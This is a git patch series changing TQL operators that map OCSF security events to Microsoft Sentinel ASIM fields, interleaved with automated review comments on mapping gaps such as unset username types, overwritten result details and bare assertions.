@@ -8,16 +8,16 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "UserManagement" asim.EventSchemaVersion = "0.1.2" asim.EventSeverity = asim.EventSeverity? else "Informational" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -asim.ActorUserId = actor?.user?.uid? +assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "GroupCreated" } "Delete" => { asim.EventType = "GroupDeleted" } "Add User" => { asim.EventType = "UserAddedToGroup" } 
@@ -26,17 +26,17 @@ match activity_name { _ => { asim.EventType = "GroupModified" } } -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.GroupName = group?.name? -asim.GroupId = group?.uid? +asim.GroupName = ocsf.group?.name? +asim.GroupId = ocsf.group?.uid? asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql index afc25d3..01cb285 100644 --- a/microsoft/operators/asim/ocsf/helpers/common.tql +++ b/microsoft/operators/asim/ocsf/helpers/common.tql 
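Review bot: `asim.ActorUsernameType` and `asim.TargetUsernameType` are only assigned inside the `domain\\name` branch, so when the username is taken from `email_addr` or a bare `name` the type field stays unset although ASIM uses it to tell UPN-style from Windows-style names. A fallback before the domain override, such as `asim.ActorUsernameType = "UPN" if (asim.ActorUsername?.contains("@") else false) else "Simple"`, covers the other branches; the same gap exists in the process_activity, scheduled_job_activity and windows_service_activity hunks. The `match ocsf.activity_name` block is cut between this file's two hunks.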
@@ -2,29 +2,28 @@ description: Initializes shared ASIM fields from a validated OCSF event. --- -_ocsf = this -asim = {} +this = {ocsf: this, asim: {}} asim.EventCount = 1 -asim.EventStartTime = start_time? else time -asim.EventEndTime = end_time? else time -asim.EventProduct = metadata?.product?.name? else metadata?.product?.feature?.name? else "Unknown" -asim.EventVendor = metadata?.product?.vendor_name? else "Microsoft" +asim.EventStartTime = ocsf.start_time? else ocsf.time +asim.EventEndTime = ocsf.end_time? else ocsf.time +asim.EventProduct = ocsf.metadata?.product?.name? else ocsf.metadata?.product?.feature?.name? else "Unknown" +asim.EventVendor = ocsf.metadata?.product?.vendor_name? else "Microsoft" -if metadata?.original_event_uid? != null { - asim.EventOriginalUid = metadata.original_event_uid - asim.EventUid = metadata.original_event_uid +if ocsf.metadata?.original_event_uid? != null { + asim.EventOriginalUid = ocsf.metadata.original_event_uid + asim.EventUid = ocsf.metadata.original_event_uid } -if metadata?.event_code? != null { - asim.EventOriginalType = metadata.event_code +if ocsf.metadata?.event_code? != null { + asim.EventOriginalType = ocsf.metadata.event_code } else { - asim.EventOriginalType = type_uid.string() + asim.EventOriginalType = ocsf.type_uid.string() } -if message? != null { - asim.EventMessage = message +if ocsf.message? != null { + asim.EventMessage = ocsf.message } -match severity_id? { +match ocsf.severity_id? { 1 => { asim.EventSeverity = "Informational" } 
@@ -39,26 +38,26 @@ match severity_id? { } 5 => { asim.EventSeverity = "High" - asim.EventOriginalSeverity = severity? else "Critical" + asim.EventOriginalSeverity = ocsf.severity? else "Critical" } 6 => { asim.EventSeverity = "High" - asim.EventOriginalSeverity = severity? else "Fatal" + asim.EventOriginalSeverity = ocsf.severity? else "Fatal" } - _ if severity? == "Critical" or severity? == "Fatal" => { + _ if ocsf.severity? == "Critical" or ocsf.severity? == "Fatal" => { asim.EventSeverity = "High" - asim.EventOriginalSeverity = severity + asim.EventOriginalSeverity = ocsf.severity } - _ if severity? in ["Informational", "Low", "Medium", "High"] => { - asim.EventSeverity = severity + _ if ocsf.severity? in ["Informational", "Low", "Medium", "High"] => { + asim.EventSeverity = ocsf.severity } - _ if severity? != null => { - asim.EventOriginalSeverity = severity + _ if ocsf.severity? != null => { + asim.EventOriginalSeverity = ocsf.severity } _ => {} } -match status? { +match ocsf.status? { "Success" => { asim.EventResult = "Success" } @@ -69,8 +68,8 @@ match status? { asim.EventResult = "Partial" } _ => { - match status_id? { - 1 if class_uid != 2003 and class_uid != 2004 and class_uid != 2005 => { + match ocsf.status_id? { + 1 if ocsf.class_uid != 2003 and ocsf.class_uid != 2004 and ocsf.class_uid != 2005 => { asim.EventResult = "Success" } 2 => { 
@@ -82,34 +81,34 @@ match status? { } } } -if status_detail? != null { - asim.EventOriginalResultDetails = status_detail +if ocsf.status_detail? != null { + asim.EventOriginalResultDetails = ocsf.status_detail } -if status_code? != null { - asim.EventOriginalResultDetails = status_code.string() +if ocsf.status_code? != null { + asim.EventOriginalResultDetails = ocsf.status_code.string() } -if device?.hostname? != null { - asim.Dvc = device.hostname - asim.DvcHostname = device.hostname - asim.DvcFQDN = device.hostname +if ocsf.device?.hostname? != null { + asim.Dvc = ocsf.device.hostname + asim.DvcHostname = ocsf.device.hostname + asim.DvcFQDN = ocsf.device.hostname } -if device?.uid? != null { - asim.DvcId = device.uid +if ocsf.device?.uid? != null { + asim.DvcId = ocsf.device.uid } -if device?.ip? != null { - asim.DvcIpAddr = device.ip +if ocsf.device?.ip? != null { + asim.DvcIpAddr = ocsf.device.ip if asim.Dvc? == null { - asim.Dvc = device.ip.string() + asim.Dvc = ocsf.device.ip.string() } } if asim.Dvc? == null { asim.Dvc = asim.EventProduct } -if disposition? != null { - asim.DvcAction = disposition +if ocsf.disposition? != null { + asim.DvcAction = ocsf.disposition } -if action? != null { - asim.DvcAction = action +if ocsf.action? != null { + asim.DvcAction = ocsf.action } diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index cb366d7..8566279 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql 
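Review bot: `asim.EventOriginalResultDetails` is filled from `ocsf.status_detail` and then unconditionally overwritten from `ocsf.status_code` when both are present, so the human-readable detail is lost whenever a numeric code exists; `asim.DvcAction` follows the same last-writer-wins pattern, with `ocsf.action` silently replacing `ocsf.disposition`. Guarding the second assignment, `if ocsf.status_code? != null and asim.EventOriginalResultDetails? == null {`, or joining the two values would keep both. If the override order is intentional, a one-line comment stating the precedence would save the next reader from re-deriving it. The `match ocsf.status?` block closed at the top of this hunk begins in the previous hunk.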
@@ -8,12 +8,12 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "WebSession" asim.EventSchemaVersion = "0.2.7" asim.EventType = "HTTPsession" -asim.Url = http_request?.url?.url_string? -asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper() -asim.EventResultDetails = http_response?.code?.string() else status_code?.string() -if http_response?.code? != null { - asim.EventResult = "Success" if http_response.code < 400 else "Failure" +asim.Url = ocsf.http_request?.url?.url_string? +asim.HttpRequestMethod = ocsf.http_request?.http_method? else ocsf.activity_name?.to_upper() +asim.EventResultDetails = ocsf.http_response?.code?.string() else ocsf.status_code?.string() +if ocsf.http_response?.code? != null { + asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index aab0a54..86c1c73 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql 
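Review bot: `asim.HttpRequestMethod = ocsf.http_request?.http_method? else ocsf.activity_name?.to_upper()` turns the OCSF activity names `Unknown` and `Other` into the pseudo-methods `UNKNOWN` and `OTHER` whenever `http_method` is missing. Restricting the fallback, e.g. `... else (ocsf.activity_name.to_upper() if not (ocsf.activity_name? in ["Unknown", "Other"]) else null)`, keeps the field to real verbs. `asim.EventResult` is also left at whatever `helpers::common` derived from `status` when `http_response.code` is absent, which looks intentional but deserves a comment since the `< 400` rule otherwise overrides it.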
@@ -8,16 +8,16 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "NetworkSession" asim.EventSchemaVersion = "0.2.7" asim.EventType = "NetworkSession" -asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.SrcPortNumber = src_endpoint?.port? -asim.DstIpAddr = dst_endpoint?.ip? -asim.DstHostname = dst_endpoint?.hostname? -asim.DstPortNumber = dst_endpoint?.port? -asim.SrcBytes = traffic?.bytes_out? -asim.DstBytes = traffic?.bytes_in? -match disposition? { +asim.EventType = "Flow" if ocsf.activity_name == "Traffic" else asim.EventType +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.SrcPortNumber = ocsf.src_endpoint?.port? +asim.DstIpAddr = ocsf.dst_endpoint?.ip? +asim.DstHostname = ocsf.dst_endpoint?.hostname? +asim.DstPortNumber = ocsf.dst_endpoint?.port? +asim.SrcBytes = ocsf.traffic?.bytes_out? +asim.DstBytes = ocsf.traffic?.bytes_in? +match ocsf.disposition? { "Allowed" => { asim.DvcAction = "Allow" asim.EventResult = "Success" @@ -30,4 +30,4 @@ match disposition? { _ => {} } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 4601260..4fbe522 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql 
@@ -7,34 +7,34 @@ microsoft::asim::ocsf::helpers::common @name = "asim.process_event" asim.EventSchema = "ProcessEvent" asim.EventSchemaVersion = "0.1.4" -match activity_name { +match ocsf.activity_name { "Launch" => { asim.EventType = "ProcessCreated" } "Terminate" => { asim.EventType = "ProcessTerminated" } _ => { assert false, message={ reason: "unsupported OCSF to ASIM mapping", - class_uid: class_uid?, - class_name: class_name?, - type_uid: type_uid?, - type_name: type_name?, + class_uid: ocsf.class_uid?, + class_name: ocsf.class_name?, + type_uid: ocsf.type_uid?, + type_name: ocsf.type_name?, name: @name, } } } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string() -asim.ParentProcessId = actor?.process?.parent_process?.pid?.string() -asim.TargetProcessId = process?.pid?.string() -asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1] -asim.TargetProcessCommandLine = process?.cmd_line? -asim.TargetUserId = user?.uid? 
+asim.ActingProcessId = ocsf.actor?.process?.pid?.string() else ocsf.process?.parent_process?.pid?.string() else ocsf.process?.pid?.string() +asim.ParentProcessId = ocsf.actor?.process?.parent_process?.pid?.string() +asim.TargetProcessId = ocsf.process?.pid?.string() +asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else ocsf.process?.path?.split("\\")[-1] +asim.TargetProcessCommandLine = ocsf.process?.cmd_line? +asim.TargetUserId = ocsf.user?.uid? assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 874cf5f..ae4a255 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } 
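Review bot: The two failure messages in this hunk differ in null-safety: the unsupported-activity message reads `ocsf.class_uid?`, `ocsf.class_name?` and so on, while the insufficient-fields message reads `ocsf.class_uid`, `ocsf.class_name` without `?`, so the second can fail on the field lookup rather than on the intended assertion. Using the guarded form in both, `class_uid: ocsf.class_uid?, class_name: ocsf.class_name?, type_uid: ocsf.type_uid?, type_name: ocsf.type_name?`, makes the diagnostic reliable. The precondition also requires `asim.TargetProcessCommandLine != null`, which rejects `Terminate` events that carry no `process.cmd_line`; if that set mirrors ASIM's mandatory ProcessEvent columns, a comment saying so would explain the strictness. The `match ocsf.activity_name` block starts in the previous line of this hunk.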
@@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Scheduled Task" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? 
+asim.TargetHostname = ocsf.dst_endpoint?.hostname? +asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index a42553b..8ea03c0 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } 
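Review bot: The `asim.Object` fallback chain `ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path?` is identical in this Scheduled Job mapper and in the windows_service_activity hunk below, so each mapper consults fields that belong to the other class (a scheduled-job event reaching `win_service`, a service event reaching `job`). Narrowing each to its own class, `asim.Object = ocsf.job?.name?` here and `ocsf.win_service?.name? else ocsf.win_service?.service_file?.path?` there, or moving the chain into a shared helper, would make an unexpected field source visible instead of silently accepted. The `match ocsf.activity_name` block is cut between this file's two hunks.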
@@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Service" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? 
+asim.TargetHostname = ocsf.dst_endpoint?.hostname?
+asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
 
-this = {...asim, AdditionalFields: _ocsf}
+this = {...asim, AdditionalFields: ocsf}
From 2230a7c51cd9250fb73fa63237f11ac4c22f9b27 Mon Sep 17 00:00:00 2001
From: Matthias Vallentin
Date: Mon, 8 Jun 2026 17:15:28 +0200
Subject: [PATCH 09/27] Streamline Microsoft mapper wrappers

Run the generic ASIM wrapper through OCSF normalization only when class_uid is absent, then always dispatch via the ASIM OCSF mapper with raw passthrough. Initialize source and target namespaces in one assignment for Graph and Windows OCSF wrappers.

Assisted-by: GPT-5 Codex (Superconductor)
---
 microsoft/operators/asim/map.tql | 7 +++----
 microsoft/operators/asim/ocsf/map.tql | 10 ++++++++++
 microsoft/operators/graph/ocsf/map.tql | 3 +--
 microsoft/operators/windows/ocsf/map.tql | 4 +---
 4 files changed, 15 insertions(+), 9 deletions(-)

diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql
index 81b6bb2..42fafb5 100644
--- a/microsoft/operators/asim/map.tql
+++ b/microsoft/operators/asim/map.tql
@@ -7,11 +7,10 @@ args:
 default: null
 ---
 
-if class_uid? != null {
- microsoft::asim::ocsf::map
-} else {
+if class_uid? == null {
 microsoft::ocsf::map raw=$raw
 ocsf::derive
 ocsf::cast
- microsoft::asim::ocsf::map
 }
+
+microsoft::asim::ocsf::map $raw
diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql
index f9025c4..f9ffffb 100644
--- a/microsoft/operators/asim/ocsf/map.tql
+++ b/microsoft/operators/asim/ocsf/map.tql
@@ -1,7 +1,17 @@
 ---
 description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM.
+args:
+ positional:
+ - name: raw
+ description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping.
+ default: null
 ---
 
+if $raw != null {
+ raw_data = $raw
+ raw_data_size = $raw.length_bytes()
+}
+
 match class_uid {
 2003 => {
 microsoft::asim::ocsf::compliance_finding
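Review bot: `raw_data = $raw` and `raw_data_size = $raw.length_bytes()` write into the top-level OCSF event unconditionally, and every leaf mapper then emits that whole event as `AdditionalFields`, so the raw Microsoft payload is duplicated inside each ASIM record and its size is charged twice. On the `class_uid? == null` path of the asim/map wrapper the value was already set by `microsoft::ocsf::map raw=$raw`, so the positional `$raw` re-writes it; guarding with `if $raw != null and raw_data? == null {` avoids the double write, and if the raw copy is not wanted in ASIM output the leaf mappers should drop `raw_data` before spreading `ocsf`. A comment on the `raw` argument stating that it overrides any `raw_data` already present would make the precedence explicit. The `match class_uid` dispatch continues past this hunk.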
diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 7838e67..84872d0 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -7,8 +7,7 @@ args: default: null --- -this = {graph: this} -ocsf = {} +this = {graph: this, ocsf: {}} if $raw != null { ocsf.raw_data = $raw diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index ac8837f..33c3f9b 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -7,9 +7,7 @@ args: default: null --- -windows = this - -ocsf = {} +this = {windows: this, ocsf: {}} if $raw != null { ocsf.raw_data = $raw ocsf.raw_data_size = $raw.length_bytes() From 587c03f379300c610497fe1f12129a92f3c3f6d4 Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:17:38 +0200 Subject: [PATCH 10/27] Assert ASIM OCSF mapper inputs Add class_uid assertions to every ASIM OCSF leaf mapper so direct calls fail before common mapper setup when the source OCSF class is wrong. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/authentication.tql | 2 ++ microsoft/operators/asim/ocsf/authorize_session.tql | 2 ++ microsoft/operators/asim/ocsf/compliance_finding.tql | 2 ++ microsoft/operators/asim/ocsf/detection_finding.tql | 2 ++ microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 ++ microsoft/operators/asim/ocsf/dns_activity.tql | 2 ++ microsoft/operators/asim/ocsf/entity_management.tql | 2 ++ microsoft/operators/asim/ocsf/event_log_activity.tql | 2 ++ microsoft/operators/asim/ocsf/file_system_activity.tql | 2 ++ microsoft/operators/asim/ocsf/group_management.tql | 2 ++ microsoft/operators/asim/ocsf/http_activity.tql | 2 ++ microsoft/operators/asim/ocsf/network_activity.tql | 2 ++ microsoft/operators/asim/ocsf/process_activity.tql | 2 ++ microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 ++ microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 ++ 15 files changed, 30 insertions(+) diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 40db64a..4a0e603 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -2,6 +2,8 @@ description: Maps OCSF Authentication events to Microsoft Sentinel ASIM Authentication events. --- +assert class_uid == 3002 + microsoft::asim::ocsf::helpers::common @name = "asim.authentication" diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 574f6d5..d7eba65 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql 
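Review bot: `assert class_uid == 3002` carries no `message=`, unlike every other assertion in these mappers, so a mis-routed event fails with a bare assertion and no class or type information; the same bare form is added in the authorize_session, compliance_finding, detection_finding, dhcp_activity, dns_activity, entity_management, event_log_activity, file_system_activity, group_management, http_activity, network_activity, process_activity, scheduled_job_activity and windows_service_activity hunks. `assert class_uid? == 3002, message={reason: "unexpected OCSF class for ASIM mapper", class_uid: class_uid?, class_name: class_name?, name: "asim.authentication"}` would also survive a missing `class_uid` instead of failing on the field lookup. A one-line comment that the guard exists for direct invocation, which the commit message explains but the file does not, would help the next reader.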
@@ -2,6 +2,8 @@ description: Maps OCSF Authorize Session events to Microsoft Sentinel ASIM Authentication events. --- +assert class_uid == 3003 + microsoft::asim::ocsf::helpers::common @name = "asim.authentication" diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index d02093d..6bab6c7 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -2,6 +2,8 @@ description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM AlertEvent records. --- +assert class_uid == 2003 + microsoft::asim::ocsf::helpers::common @name = "asim.alert_event" diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 795ee08..67be606 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -2,6 +2,8 @@ description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM AlertEvent records. --- +assert class_uid == 2004 + let $threat_categories = { adware: "Adware", cryptominer: "Cryptominor", diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 1d6b638..a168f31 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent records. --- +assert class_uid == 4004 + microsoft::asim::ocsf::helpers::common @name = "asim.dhcp_event" diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 8c71da7..50731b3 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql 
@@ -2,6 +2,8 @@ description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns records. --- +assert class_uid == 4003 + microsoft::asim::ocsf::helpers::common @name = "asim.dns" diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 02cf88f..4e12fb3 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -2,6 +2,8 @@ description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 3004 + microsoft::asim::ocsf::helpers::common @name = "asim.audit_event" diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index d2b2c71..bace4cc 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 1008 + microsoft::asim::ocsf::helpers::common @name = 